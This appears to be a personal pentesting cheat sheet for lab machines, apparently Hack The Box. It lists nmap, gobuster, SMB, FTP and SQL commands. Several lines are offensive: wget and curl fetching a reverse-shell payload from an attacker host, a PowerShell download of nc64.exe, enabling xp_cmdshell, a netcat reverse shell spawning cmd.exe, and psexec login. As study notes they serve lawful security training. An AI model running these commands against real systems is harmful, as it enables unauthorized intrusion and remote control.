Monty's Pentesting Notes | Obsidian

    Commands

    arm compile for x86

    x86_64-linux-gnu-gcc shell.c -o shell

    Active Recon

    port scan ->

    nmap -p- --min-rate=1000 -sV

    agressive -> sudo nmap IP -p 80 -A
    vulnerability scan -> sudo nmap 10.129.2.28 -p 80 -sV --script vuln

    banner grabbing (identify service running on a particular port) -> nmap -sV --script=banner -p21 [IP]

    banner grabbing using netcat -> sudo nc -nv -p 53 10.129.18.68 50000
    -p 53 is source port spoofing; -n is no dns resolution (numerical only)

    directory traversal ->

    gobuster dir -u http://IP -w /usr/share/wordlists/dirb/common.txt

    with extensions

    gobuster dir -u http://<IP> -w /usr/share/wordlists/dirb/common.txt -x pl

    subdomain enumeration via web server -> gobuster vhost -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://thetoppers.htb

    subdomain enumeration via DNS queries -> > for sub in $(cat /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt);do dig $sub.inlanefreight.htb @10.129.14.128 | grep -v ';\|SOA' | sed -r '/^\s*$/d' | grep $sub | tee -a subdomains.txt;done

    OWASP ZAP

    File Transfer

    host a http server -> sudo python3 -m http.server 8080

    get file to reverse shell -> wget http://10.10.14.1:8000/payload.sh

    get file to reverse shell (using curl) -> curl http://10.10.14.1:8000/payload.sh -o payload.sh

    Powershell reverseshell download -> powershell -c cd C:\Users\sql_svc\Downloads; wget http://hostIP/nc64.exe -outfile nc64.exe

    SMB

    list all SMB shares -> smbclient -N -L IP

    connect to SMB -> smbclient //server-ip-or-name/share_name -U username

    SMB version -> nmap --script smb-os-discovery.nse -p445 10.10.10.40

    more on SMB

    ftp

    connect to ftp -> ftp -p [IP]

    more on FTP

    NFS

    Show Available NFS Shares -> showmount -e 10.129.14.128

    more on NFS

    SMTP

    more on SMTP

    ssh

    login to ssh using private key in file -> ssh -p51646 root@94.237.62.250 -i id_rsa

    SQL

    connect Microsoft SQL Server -> python3 /usr/share/doc/python3-impacket/examples/mssqlclient.py domain/username@IP -windows-auth

    spawn Windows command shell through extended stored procedure of Microsoft SQL Server -> EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'dir C:\';

    Reverse Shell

    netcat listener for reverse shell -> sudo nc -lvnp 443

    Powershell revseseshell execute -> powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe targetIP 443

    Miscellaneous

    Local Port Forwarding: This allows the local client to access services on the remote server as if they were running on the local machine. -> ssh -L 1234:localhost:5432 christine@{target_IP}

    connect domain name with IP Address in /etc/hosts -> echo "10.129.67.241 ns1.inlanefreight.htb" | sudo tee -a /etc/hosts

    Windows powershell history -> cd AppData\Roaming\Microsoft\Windows\Powershell\PSReadLine\

    Login to remote windows -> sudo python3 psexec.py administrator@<target-ip>